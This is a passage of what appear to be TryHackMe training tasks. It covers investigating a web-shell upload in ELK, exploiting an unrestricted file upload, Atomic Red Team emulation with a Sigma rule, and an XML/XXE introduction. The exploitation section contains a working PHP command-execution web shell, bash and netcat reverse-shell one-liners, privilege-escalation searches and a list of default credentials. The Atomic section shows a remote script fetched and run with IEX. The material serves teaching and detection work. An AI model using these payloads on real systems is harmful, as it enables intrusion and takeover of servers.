logical operator is used to show documents that contain both values."Ben" AND
"25":This is used to search the (specified) field of a document for a value,
such as an IP address. Note that the field you provide here will depend on the
fields available in the index pattern.ip.address: 10.10.10.10
INVESTIGATING A WEB ATTACK WITH ELK
Scenario: Thanks to our extensive intrusion detection capabilities, our systems
alerted the SOC team to a web shell being uploaded to the WareVille Rails
booking platform on Oct 1, 2024. Our task is to review the web server logs to
determine how the attacker achieved this.
If you would like to follow along, ensure that you have the "wareville-rails"
collection selected like so:
To investigate this scenario, let's change the time filter to show events for
the day of the attack, setting the start date and time to "Oct 1, 2024 @
00:00:00.000" and the end date and time to "Oct 2, 2024 @ 00:00:00.000".
You will see the logs have now populated within the display. Please note that
the quantity of entries (hits) in this task may differ to the amount on the
practical VM.
An incredibly beneficial feature of ELK is that we can filter out noise. A web
server (especially a popular one) will likely have a large number of logs from
user traffic—completely unrelated to the attack. Using the fields pane on the
left, we can click on the "+" and "-" icons next to the field to show only that
value or to remove it from the display, respectively.
Fun fact: Clicking on these filters is actually just applying the relevant KQL
syntax.
Note in the GIF below how the logs are being filtered to only show logs
containing the IP address 10.13.27.115 (reducing the count from 1,028 to 423
hits). We can combine filtering multiple fields in or out to drill down
specifically into the logs.
To remove applied filters, simply click on the "x" alongside the filter, just
below the search bar.
In this investigation, let's look at the activity of the IP address
10.9.98.230. We can click on the "clientip" field to see the IPs with the most
values.
Using the timeline at the top, we can see a lot of activity from this IP address
took place between 11:30:00 and 11:35:00. This would be a good place to begin
our analysis.
Each log can be expanded by using the ">" icon located on the left of the
log/document. Fortunately, the logs are pretty small in this instance, so we can
browse through them to look for anything untoward.
After some digging, a few logs stand out. Looking at the request field, we can
see that a file named "shell.php" has been accessed, with a few parameters
"c" and "d" containing commands. These are likely to be commands input into some
form of web shell.
Now that we have an initial lead, let’s use a search query to find all logs that
contain "shell.php". Using the search bar at the top, the query message:
"shell.php" will search for all entries of "shell.php" in the message field of
the logs.
OPERATION RED
In this section we will now take a look at the red aspect. In other words, the
attack itself and how it was carried out.
WHY DO WEBSITES ALLOW FILE UPLOADS
FILE UPLOADS ARE EVERYWHERE ON WEBSITES, AND FOR GOOD REASON. USERS OFTEN NEED
TO UPLOAD FILES LIKE PROFILE PICTURES, INVOICES, OR OTHER DOCUMENTS TO UPDATE
THEIR ACCOUNTS, SEND RECEIPTS, OR SUBMIT CLAIMS. THESE FEATURES MAKE THE USER
EXPERIENCE SMOOTHER AND MORE EFFICIENT. BUT WHILE THIS IS CONVENIENT, IT ALSO
CREATES A RISK IF FILE UPLOADS AREN'T HANDLED PROPERLY. IF NOT PROPERLY SECURED,
THIS FEATURE CAN OPEN UP VARIOUS VULNERABILITIES ATTACKERS CAN EXPLOIT.
FILE UPLOAD VULNERABILITIES
File upload vulnerabilities occur when a website doesn't properly handle the
files that users upload. If the site doesn't check what kind of file is being
uploaded, how big it is, or what it contains, it opens the door to all sorts of
attacks. For example:
* RCE: Uploading a script that the server runs gives the attacker control over
it.
* XSS: Uploading an HTML file that contains an XSS code which will steal a
cookie and send it back to the attacker's server.
These can happen if a site doesn't properly secure its file upload
functionality.
WHY UNRESTRICTED FILE UPLOADS ARE DANGEROUS
Unrestricted file uploads can be particularly dangerous because they allow an
attacker to upload any type of file. If the file's contents aren't properly
validated to ensure only specific formats like PNG or JPG are accepted, an
attacker could upload a malicious script, such as a PHP file or an executable,
that the server might process and run. This can lead to code execution on the
server, allowing attackers to take over the system.
Examples of abuse through unrestricted file uploads include:
* Uploading a script that the server executes, leading to RCE.
* Uploading a crafted image file that triggers a vulnerability when processed
by the server.
* Uploading a web shell and browsing to it directly using a browser.
USAGE OF WEAK CREDENTIALS
One of the easiest ways for attackers to break into systems is through weak or
default credentials. This can be an open door for attackers to gain unauthorised
access. Default credentials are often found in systems where administrators fail
to change initial login details provided during setup. For attackers, trying a
few common usernames and passwords can lead to easy access.
Below are some examples of weak/default credentials that attackers might try:
UsernamePasswordadminadminadministratoradministratoradmin@domainnameadminguestguest
Attackers can use tools or try these common credentials manually, which is often
all it takes to break into the system.
WHAT IS REMOTE CODE EXECUTION (RCE)
Remote code execution (RCE) happens when an attacker finds a way to run their
own code on a system. This is a highly dangerous vulnerability because it can
allow the attacker to take control of the system, exfiltrate sensitive data, or
compromise other connected systems.
WHAT IS A WEB SHELL
A web shell is a script that attackers upload to a vulnerable server, giving
them remote control over it. Once a web shell is in place, attackers can run
commands, manipulate files, and essentially use the compromised server as their
own. They can even use it to launch attacks on other systems.
For example, attackers could use a web shell to:
* Execute commands on the server
* Move laterally within the network
* Download sensitive data or pivot to other services
A web shell typically gives the attacker a web-based interface to run commands.
Still, in some cases, attackers may use a reverse shell to establish a direct
connection back to their system, allowing them to control the compromised
machine remotely. Once an attacker has this level of access, they might attempt
privilege escalation to gain even more control, such as achieving root access or
moving deeper into the network.
Okay, now that we're familiar with a remote code execution vulnerability and how
it works, let's take a look at how we would exploit it!
PRACTICE MAKES PERFECT
To understand how a file upload vulnerability can result in an RCE, the best
approach is to get some hands-on experience with it. A handy (and ethical) way
to do this is to find and download a reputable open-source web application which
has this vulnerability built into it. Many open-source projects exist in places
like GitHub, which can be run in your own environment to experiment and
practice. In today's task, we will demonstrate achieving RCE via unrestricted
file upload within an open-source railway management system that has this
vulnerability built into it.
EXPLOITING RCE VIA FILE UPLOAD
Now we're going to go through how this vulnerability can be exploited. For now,
you can just read along, but an opportunity to put this knowledge into practice
is coming up. Once an RCE vulnerability has been identified that can be
exploited via file upload, we now need to create a malicious file that will
allow remote code execution when uploaded.
Below is an example PHP file which could be uploaded to exploit this
vulnerability. Using your favourite text editor, copy and paste the below code
and save it as shell.php.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
The above script, when accessed, displays an input field. Whatever is entered in
this input field is then run against the underlying operating system using the
system() PHP function, and the output is displayed to the user. This is the
perfect file to upload to the vulnerable rail system reservation application.
The vulnerability is surrounding the upload of a new profile image. So, to
exploit it, we navigate to the profile picture page:
Instead of a new profile picture, we can upload our malicious PHP script and
update our profile:
In the case of this application, the RCE is possible through unrestricted file
upload. Once this "profile picture" is uploaded and updated, it is stored in the
/admin/assets/img/profile/ directory. The file can then be accessed directly via
http://<ip-address-or-localhost>/<projectname>/admin/assets/img/profile/shell.php.
When this is accessed, we can then see the malicious code in action:
Now, we can run commands directly against the operating system using this bar,
and the output will be displayed. For example, running the command pwd now
returns the following:
MAKING THE MOST OF IT
Once the vulnerability has been exploited and you now have access to the
operating system via a web shell, there are many next steps you could take
depending on a) what your goal is and b) what misconfigurations are present on
the system, which will determine exactly what we can do. Here are some examples
of commands you could run once you have gained access and why you might run them
(if the system is running on a Linux OS like our example target system):
Command Use ls Will give you an idea of what files/directories surround you catA
command used to output the contents of documents such as text files pwd Will
give you an idea of where in the system you are whoami Will let you know who you
are in the system hostname The system name and potentially its role in the
network uname -a Will give you some system information like the OS, kernel
version, and more id If the current user is assigned to any groups ifconfig
Allows you to understand the system's network setup bash -i >&
/dev/tcp/<your-ip>/<port> 0>&1 A command used to begin a reverse shell via bash
nc -e /bin/sh <your-ip> <port> A command used to begin a reverse shell via
Netcat find / -perm -4000 -type f 2>/dev/null Finds SUID (Set User ID) files,
useful in privilege escalation attempts as it can sometimes be leveraged to
execute binary with privileges of its owner (which is often root) find /
-writable -type f 2>/dev/null | grep -v "/proc/" Also helpful in privilege
escalation attempts used to find files with writable permissions
These are just some commands that can be run following a successful RCE exploit.
It's very open-ended, and what you can do will rely on your abilities to inspect
an environment and vulnerabilities in the system itself.
PRACTICAL
Your task today is two-fold. First, you must access Kibana on MACHINE_IP:5601 to
investigate the attack and answer the blue questions below. Then, you will
proceed to Frosty Pines Resort's website at http://frostypines.thm and recreate
the attack to answer the red questions and inform the developers what element of
the website was vulnerable.
Please note, to access http://frostypines.thm, you will need to reference it
within your hosts file. On the AttackBox, this can be done by executing the
following command in a terminal: echo "MACHINE_IP frostypines.thm" >> /etc/hosts
If you do not see an IP address (i.e. 10.10.x.x) and only MACHINE IP, ensure
that you have started the target machine by pressing on the green "Start
Machine" button further up the task, within the heading "Connecting to the
Machine".
To review the logs of the attack on Frosty Pines Resorts, make sure you select
the "frostypines-resorts" collection within ELK. Such as below:
The date and time that you will need to use when reviewing logs will be between
11:30 and 12:00 on October 3rd 2024.
Remember, to access the Frosty Pines Resorts website
(http://frostypines.thm), you will need to reference it in your hosts file. On
the AttackBox, this can be done by executing the following command in a
terminal: echo "MACHINE_IP frostypines.thm" >> /etc/hosts
Answer the questions below
BLUE: Where was the web shell uploaded to?
Answer format: /directory/directory/directory/filename.php
Login to answer..Hint
BLUE: What IP address accessed the web shell?
Login to answer..Hint
RED: What is the contents of the flag.txt?
Login to answer..
If you liked today's task, you can learn how to harness the power of advanced
ELK queries.
Login to answer..
Task 10 Atomic Red Team Day 4: I’m all atomic inside!
Task includes a deployable machine
The Story
Click here to watch the walkthrough video!
SOC-mas is approaching! And the town of Warewille started preparations for the
grand event.
Glitch, a quiet, talented security SOC-mas engineer, had a hunch that these
year's celebrations would be different. With looming threats, he decided to
revamp the town's security defences. Glitch began to fortify the town's security
defences quietly and meticulously. He started by implementing a protective
firewall, patching vulnerabilities, and accessing endpoints to patch for
security vulnerabilities. As he worked tirelessly, he left "breadcrumbs," small
traces of his activity.
Unaware of Glitch's good intentions, the SOC team spotted anomalies: Logs
showing admin access, escalation of privileges, patched systems behaving
differently, and security tools triggering alerts. The SOC team misinterpreted
the system modifications as a sign of an insider threat or rogue attacker and
decided to launch an investigation using the Atomic Red Team framework.
LEARNING OBJECTIVES
* Learn how to identify malicious techniques using the MITRE ATT&CK framework.
* Learn about how to use Atomic Red Team tests to conduct attack simulations.
* Understand how to create alerting and detection rules from the attack tests.
CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card below:
Click on the green Start Machine button below to start the virtual machine and
wait 1-2 minutes for the system to boot completely in a split-screen view.
Start Machine
If the virtual machine isn't visible, use the blue Show Split View button at the
top of the page.
Additionally, if you wish to connect to the machine via RDP, use the credentials
below:
Username Administrator Password Emulation101! IP MACHINE_IP
The VM has Atomic Red Team and Sysmon installed. This will allow us to emulate
an attack using TTPs described in the MITRE ATT&CK framework.
DETECTION GAPS
While it might be the utopian dream of every blue teamer, we will rarely be able
to detect every attack or step in an attack kill chain. This is a reality that
all blue teamers face: there are gaps in their detection. But worry not! These
gaps do not have to be the size of black holes; there are things we can do to
help make these gaps smaller.
Detection gaps are usually for one of two main reasons:
* Security is a cat-and-mouse game. As we detect more, the threat actors and
red teamers will find new sneaky ways to thwart our detection. We then need
to study these novel techniques and update our signature and alert rules to
detect these new techniques.
* The line between anomalous and expected behaviour is often very fine and
sometimes even has significant overlap. For example, let's say we are a
company based in the US. We expect to see almost all of our logins come from
IP addresses in the US. One day, we get a login event from an IP in the EU,
which would be an anomaly. However, it could also be our CEO travelling for
business. This is an example where normal and malicious behaviour intertwine,
making it hard to create accurate detection rules that would not have too
much noise.
Blue teams constantly refine and improve their detection rules to close the gaps
they experience due to the two reasons mentioned above. Let's take a look at how
this can be done!
CYBER ATTACKS AND THE KILL CHAIN
Before diving into creating new detection rules, we first have to discuss some
key topics. The first topic to discuss is the Cyber Kill chain. All cyber
attacks follow a fairly standard process, which is explained quite well by the
Unified Cyber Kill chain:
As a blue teamer, it would be our dream to prevent all attacks at the start of
the kill chain. So even just when threat actors start their reconnaissance, we
already stop them dead in their tracks. But, as discussed before, this is not
possible. The goal then shifts slightly. If we are unable to fully detect and
prevent a threat actor at any one phase in the kill chain, the goal becomes to
perform detections across the entire kill chain in such a way that even if there
are detection gaps in a single phase, the gap is covered in a later phase. The
goal is, therefore, to ensure we can detect the threat actor before the very
last phase of goal execution.
MITRE ATT&CK
A popular framework for understanding the different techniques and tactics that
threat actors perform through the kill chain is the MITRE ATT&CK framework. The
framework is a collection of tactics, techniques, and procedures that have been
seen to be implemented by real threat actors. The framework provides a navigator
tool where these TTPs can be investigated:
However, the framework primarily discusses these TTPs in a theoretical manner.
Even if we know we have a gap for a specific TTP, we don't really know how to
test the gap or close it down. This is where the Atomics come in!
ATOMIC RED
The Atomic Red Team library is a collection of red team test cases that are
mapped to the MITRE ATT&CK framework. The library consists of simple test cases
that can be executed by any blue team to test for detection gaps and help close
them down. The library also supports automation, where the techniques can be
automatically executed. However, it is also possible to execute them manually.
DROPPING THE ATOMIC
McSkidy has a vague idea of what happened to the "compromised machine." It seems
someone tried to use the Atomic Red Team to emulate an attack on one of our
systems without permission. The perpetrator also did not clean up the test
artefacts. Let's have a look at what happened.
RUNNING AN ATOMIC
McSkidy suspects that the supposed attacker used the MITRE ATT&CK
technique T1566.001 Spearphishing with an attachment. Let's recreate the attack
emulation performed by the supposed attacker and then look for the artefacts
created.
Open up a PowerShell prompt as administrator and follow along with us. Let's
start by having a quick peek at the help page. Enter the command Get-Help
Invoke-Atomictest. You should see the output below:
Administrator: Windows PowerShell
PS C:\Users\Administrator> Get-Help Invoke-Atomictest
NAME
Invoke-AtomicTest
SYNTAX
Invoke-AtomicTest [-AtomicTechnique] <string[]> [-ShowDetails] [-ShowDetailsBrief] [-TestNumbers <string[]>]
[-TestNames <string[]>] [-TestGuids <string[]>] [-PathToAtomicsFolder <string>] [-CheckPrereqs]
[-PromptForInputArgs] [-GetPrereqs] [-Cleanup] [-NoExecutionLog] [-ExecutionLogPath <string>] [-Force] [-InputArgs<hashtable>] [-TimeoutSeconds <int>] [-Session <PSSession[]>] [-Interactive] [-KeepStdOutStdErrFiles]
[-LoggingModule <string>] [-WhatIf] [-Confirm] [<CommonParameters>]
ALIASES
None
REMARKS
None
The help above only shows what parameters are available without any explanation.
Even though most parameter names are self-explanatory, let us have a quick
overview of the parameters we will use in this walkthrough:
Parameter Explanation Example use
-Atomic Technique
This defines what technique you want to emulate. You can use the complete
technique name or the "TXXXX" value. This flag can be omitted.
Invoke-AtomicTest -AtomicTechnique T1566.001
-ShowDetails
Shows the details of each test included in the Atomic.
Invoke-AtomicTest T1566.001 -ShowDetails
-ShowDetailsBrief
Shows the title of each test included in the Atomic.
Invoke-AtomicTest T1566.001 -ShowDetailsBrief
-CheckPrereqs
Provides a check if all necessary components are present for testing
Invoke-AtomicTest T1566.001 -CheckPrereqs
-TestNames
Sets the tests you want to execute using the complete Atomic Test Name.
Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing
Attachment"
-TestGuids
Sets the tests you want to execute using the unique test identifier.
Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306
-TestNumbers
Sets the tests you want to execute using the test number. The scope is limited
to the Atomic Technique. Invoke-AtomicTest T1566.001 -TestNumbers 2,3
-Cleanup
Run the cleanup commands that were configured to revert your machine state to
normal.
Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup
Our First Command
We can build our first command now that we know which parameters are available.
We would like to know more about what exactly happens when we test the Technique
T1566.001. To get this information, we must include the name of the technique we
want information about and then add the flag -ShowDetails to our command. Let's
have a look at the command we constructed: Invoke-AtomicTest T1566.001
-ShowDetails. This command displays the details of all tests included in the
T1566.001 Atomic.
Atomic Test T1566.001 Details
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -ShowDetails
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Download Macro-Enabled Phishing Attachment
Atomic Test Number: 1
Atomic Test GUID: 114ccff9-ae6d-4547-9ead-4cd69f687306
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating
an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" is downloaded to the %temp
% directory.
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm
Cleanup Commands:
Command:
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore
[!!!!!!!!END TEST!!!!!!!]
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Word spawned a command shell and used an IP address in the command line
Atomic Test Number: 2
Atomic Test GUID: cbb6799a-425c-4f83-9194-5447a909d67f
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indiciat
or of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
Command (with inputs):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"C:\Users\Public\art.jse`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
Cleanup Commands:
Command:
Remove-Item #{jse_path} -ErrorAction Ignore
Command (with inputs):
Remove-Item C:\Users\Public\art.jse -ErrorAction Ignore
Dependencies:
Description: Microsoft Word must be installed
Check Prereq Command:
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Check Prereq Command (with inputs):
try {
New-Object -COMObject "Word.Application" | Out-Null
$process = "Word"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Get Prereq Command:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
Get Prereq Command (with inputs):
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
[!!!!!!!!END TEST!!!!!!!]
The output above is clearly split up into multiple parts, each matching a test.
Let's examine what type of information is provided in a test. We will use the
test we want to run as an example.
Key Value Description Technique Phishing: Spearphishing Attachment T1566.001 The
full name of the MITRE ATT&CK technique that will be tested Atomic Test Name
Download Macro-Enabled Phishing Attachment A descriptive name of the type of
test that will be executed Atomic Test Number 1 A number is assigned to the
test; we can use this in the command to specify which test we want to run.
Atomic Test GUID 114ccff9-ae6d-4547-9ead-4cd69f687306 A unique ID is assigned to
this test; we can use this in the command to specify which test we want to run.
Description This atomic test downloads a macro-enabled document from the Atomic
Red Team GitHub repository, simulating an end-user clicking a phishing link to
download the file. The file "PhishingAttachment.xlsm" is downloaded to the
%temp% directory. Provides a detailed explanation of what the test will do.
Attack commands
Executor: powershell
ElevationRequired: False
Command: $url = ‘http://localhost/PhishingAttachment.xlsm’ Invoke-WebRequest
-Uri $url -OutFile $env:TEMP.xlsm
This provides an overview of all the commands run during the test, including the
executor of those commands and the required privileges. It also helps us
determine where to look for artefacts in Windows Event Viewer. Cleanup commands
Command: Remove-Item $env:TEMP.xlsm -ErrorAction Ignore An overview of the
commands executed to revert the machine back to its original state. Dependencies
There are no dependencies required.
An overview of all required resources that must be present on the testing
machine in order to execute the test
Phishing: Spearphishing Attachment T1566.001 Emulated
Let's continue and run the first test of T1566.001. Before running the
emulation, we should ensure that all required resources are in place to conduct
it successfully. To verify this, we can add the flag -Checkprereq to our
command. The command should look something like this: Invoke-AtomicTest
T1566.001 -TestNumbers 1 -CheckPrereq.
This command will use the data included in the "dependencies" part of the test
details to verify if all required resources are present. Looking at the test 1
dependencies of the T1566.001 Atomic, no additional resources are required. Run
the same command for test 2, and it will state that Microsoft Word needs to be
installed, as shown below:
Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 2 -CheckPrereq
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
CheckPrereq's for: T1566.001-2 Word spawned a command shell and used an IP address in the command line
Prerequisites not met: T1566.001-2 Word spawned a command shell and used an IP address in the command line
[*] Microsoft Word must be installed
Try installing prereq's with the -GetPrereqs switch
Now that we have verified the dependencies, let us continue with the emulation.
Execute the following command to start the emulation: Invoke-AtomicTest
T1566.001 -TestNumbers 1 and you should get the following output:
Executing Atomic Test T1566.001
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Based on the output, we can determine that the test was successfully executed.
We can now analyse the logs in theWindows Event Viewer to find Indicators of
Attack and Compromise.
DETECTING THE ATOMIC
Now that we have executed the T1566.001 Atomic, we can look for log entries that
point us to this emulated attack. For this purpose, we will use the Windows
Event Logs. This machine comes with Sysmon installed. System Monitor (Sysmon)
provides us with detailed information about process creation, network
connections, and changes to file creation time.
To make it easier for us to pick up the events created for this emulation, we
will first start with cleaning up files from the previous test by running the
command Invoke-AtomicTest T1566.001 -TestNumbers 1 -cleanup.
Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1 -cleanup
Now, we will clear the Sysmon event log:
* Open up Event Viewer by clicking the icon in the taskbar, or searching for it
in the Start Menu.
* Navigate to Applications and Services => Microsoft => Windows => Sysmon =>
Operational on the left-hand side of the screen.
* Right-click Operational on the left-hand side of the screen and click Clear
Log. Click Clear when the popup shows.
Now that we have cleaned up the files and the sysmon logs, let us run the
emulation again by issuing the command Invoke-AtomicTest T1566.001 -TestNumbers
1.
Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Next, go to the Event Viewer and right-click on the Operational log on the
left-hand side of the screen and then click on Refresh. There should be new
events related to the emulated attack. Now sort the table on the Date and Time
column to order the events chronologically (oldest first). The first two events
of the list are tests that Atomic executes for every emulation. We are
interested in 2 events that detail the attack:
* First, a process was created for PowerShell to execute the following command:
"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}.
* Then, a file was created with the name PhishingAttachment.xlsm.
Click on each event to see the details. When you select an event, you should see
a detailed overview of all the data collected for that event. Click on the
Details tab to show all the EventData in a readable format. Let us take a look
at the details of these events below. The data highlighted is valuable for
incident response and creating alerting rules.
Navigate to the directory C:\Users\Administrator\AppData\Local\Temp\, and open
the file PhishingAttachment.txt. The flag included is the answer to question 1.
Make sure to answer the question now, as the cleanup command will delete this
file.
Let's clean up the artefacts from our spearphishing emulation. Enter the command
Invoke-AtomicTest T1566.001-1 -cleanup.
Now that we know which artefacts were created during this spearphishing
emulation, we can use them to create custom alerting rules. In the next section,
we will explore this topic further.
ALERTING ON THE ATOMIC
In the previous paragraph, we found multiple indicators of compromise through
the Sysmon event log. We can use this information to create detection rules to
include in our EDR, SIEM, IDS, etc. These tools offer functionalities that allow
us to import custom detection rules. There are several detection rule formats,
including Yara, Sigma, Snort, and more. Let's look at how we can implement the
artefacts related to T1566.001 to create a custom Sigma rule.
Two events contained possible indicators of compromise. Let's focus on the event
that contained the Invoke-WebRequest command line:
"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}"
We can use multiple parts of this artefact to include in our custom Sigma rule.
* Invoke-WebRequest: It is not common for this command to run from a script
behind the scenes.
* $url = 'http://localhost/PhishingAttachment.xlsm': Attackers often use a
specific malicious domain to host their payloads. Including the malicious URL
in the Sigma rule could help us detect that specific URL.
* PhishingAttachment.xlsm: This is the malicious payload downloaded and saved
on our system. We can include its name in the Sigma rule as well.
Combining all these pieces of information in a Sigma rule would look something
like this:
PowerShell Invoke-WebRequest Sigma Rule
title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
id: 1
description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
status: experimental
author: TryHackMe
logsource:
category: process_creation
product: windows
service: sysmon
detection:
selection_invoke_webrequest:
EventID: 1
CommandLine|contains:
- 'Invoke-WebRequest'
- 'http://localhost/PhishingAttachment.xlsm'
selection_file_creation:
EventID: 11 # Sysmon Event ID for File Creation
TargetFilename|endswith: '\PhishingAttachment.xlsm'
condition: selection_invoke_webrequest or selection_file_creation
falsepositives:
- Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
level: high
tags:
- attack.t1071.001 # Web Service - Application Layer Protocol
- attack.t1059.001 # PowerShell
- attack.t1105 # Ingress Tool Transfer
- attack.t1566.001 # Spearphishing Attachment
The detection part is where the effective detection is happening. We can see
clearly the artefacts that we discovered during the emulation test. We can then
import this rule into the main tools we use for alerts, such as the EDR, SIEM,
XDR, and many more.
Now that Glitch has shown us his intentions, let's continue with his work and
run an emulation for ransomware.
CHALLENGE
As Glitch continues to prepare for SOC-mas and fortifies Wareville's security,
he decides to conduct an attack simulation that would mimic a ransomware attack
across the environment. He is unsure of the correct detection metrics to
implement for this test and asks you for help. Your task is to identify the
correct atomic test to run that will take advantage of a command and scripting
interpreter, conduct the test, and extract valuable artefacts that would be used
to craft a detection rule.
Answer the questions below
What was the flag found in the .txt file that is found in the same directory as
the PhishingAttachment.xslm artefact?
Login to answer..Hint
What ATT&CK technique ID would be our point of interest?
Login to answer..Hint
What ATT&CK subtechnique ID focuses on the Windows Command Shell?
Login to answer..Hint
What is the name of the Atomic Test to be simulated?
Login to answer..Hint
What is the name of the file used in the test?
Login to answer..
What is the flag found from this Atomic Test?
Login to answer..Hint
Learn more about the Atomic Red Team via the linked room.
Login to answer..
Task 11 XXE Day 5: SOC-mas XX-what-ee?
Task includes a deployable machine
The Story
The days in Wareville flew by, and Software's projects were nearly complete,
just in time for Christmas. One evening, after wrapping up work, Software was
strolling through the town when he came across a young boy looking dejected.
Curious, Software asked, "What would you like for Christmas?" The boy replied
with a sigh, "I wish for a teddy bear, but I know that my family can't afford
one."
This brief conversation sparked an idea in Software's mind—what if there was a
platform where everyone in town could share their Christmas wishes, and the
Mayor's office could help make them come true? Excited by the potential,
Software introduced the idea to Mayor Malware, who embraced it immediately. The
Mayor encouraged the team to build the platform for the people of Wareville.
Through the developers' dedication and effort, the platform was soon ready and
became an instant hit. The townspeople loved it! However, in their rush to meet
the holiday deadline, the team had overlooked something critical—thorough
security testing. Even Mayor Malware had chipped in to help develop a feature in
the final hours. Now, it's up to you to ensure the application is secure and
free of vulnerabilities. Can you guarantee the platform runs safely for the
people of Wareville?
Learning Objectives
* Understand the basic concepts related to XML
* Explore XML External Entity (XXE) and its components
* Learn how to exploit the vulnerability
* Understand remediation measures
Important Concepts
Extensible Markup Language (XML)
XML is a commonly used method to transport and store data in a structured format
that humans and machines can easily understand. Consider a scenario where two
computers need to communicate and share data. Both devices need to agree on a
common format for exchanging information. This agreement (format) is known as
XML. You can think of XML as a digital filing cabinet. Just as a filing cabinet
has folders with labelled documents inside, XML uses tags to label and organise
information. These tags are like folders that define the type of data stored.
This is what an XML looks like, a simple piece of text information organised in
a structured manner:
<people>
<name>Glitch</name>
<address>Wareville</address>
<email>glitch@wareville.com</email>
<phone>111000</phone>
</people>
In this case, the tags <people>, <name>, <address>, etc are like folders in a
filing cabinet, but now they store data about Glitch. The content inside the
tags, like "Glitch," "Wareville," and "123-4567" represents the actual data
being stored. Like before, the key benefit of XML is that it is easily shareable
and customisable, allowing you to create your own tags.
Document Type Definition (DTD)
Now that the two computers have agreed to share data in a common format, what
about the structure of the format? Here is when the DTD comes into play. A DTD
is a set of rules that defines the structure of an XML document. Just like a
database scheme, it acts like a blueprint, telling you what elements (tags) and
attributes are allowed in the XML file. Think of it as a guideline that ensures
the XML document follows a specific structure.
For example, if we want to ensure that an XML document about people will always
include a name, address, email, and phone number, we would define those rules
through a DTD as shown below:
<!DOCTYPE people [
<!ELEMENT people(name, address, email, phone)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT address (#PCDATA)>
<!ELEMENT email (#PCDATA)>
<!ELEMENT phone (#PCDATA)>
]>
In the above DTD, <!ELEMENT> defines the elements (tags) that are allowed, like
name, address, email, and phone, whereas #PCDATA stands for parsed people data,
meaning it will consist of just plain text.
Entities
So far, both computers have agreed on the format, the structure of data, and the
type of data they will share. Entities in XML are placeholders that allow the
insertion of large chunks of data or referencing internal or external files.
They assist in making the XML file easy to manage, especially when the same data
is repeated multiple times. Entities can be defined internally within the XML
document or externally, referencing data from an outside source.
For example, an external entity references data from an external file or
resource. In the following code, the entity &ext; could refer to an external
file located at "http://tryhackme.com/robots.txt", which would be loaded into
the XML, if allowed by the system:
<!DOCTYPE people [
<!ENTITY ext SYSTEM "http://tryhackme.com/robots.txt">
]>
<people>
<name>Glitch</name>
<address>&ext;</address>
<email>glitch@wareville.com</email>
<phone>111000</phone>
</people>
We are specifically discussing external entities because it is one of the main
reasons that XXE is introduced if it is not properly managed.
XML External Entity (XXE)
After understanding XML and how entities work, we can now explore the XXE
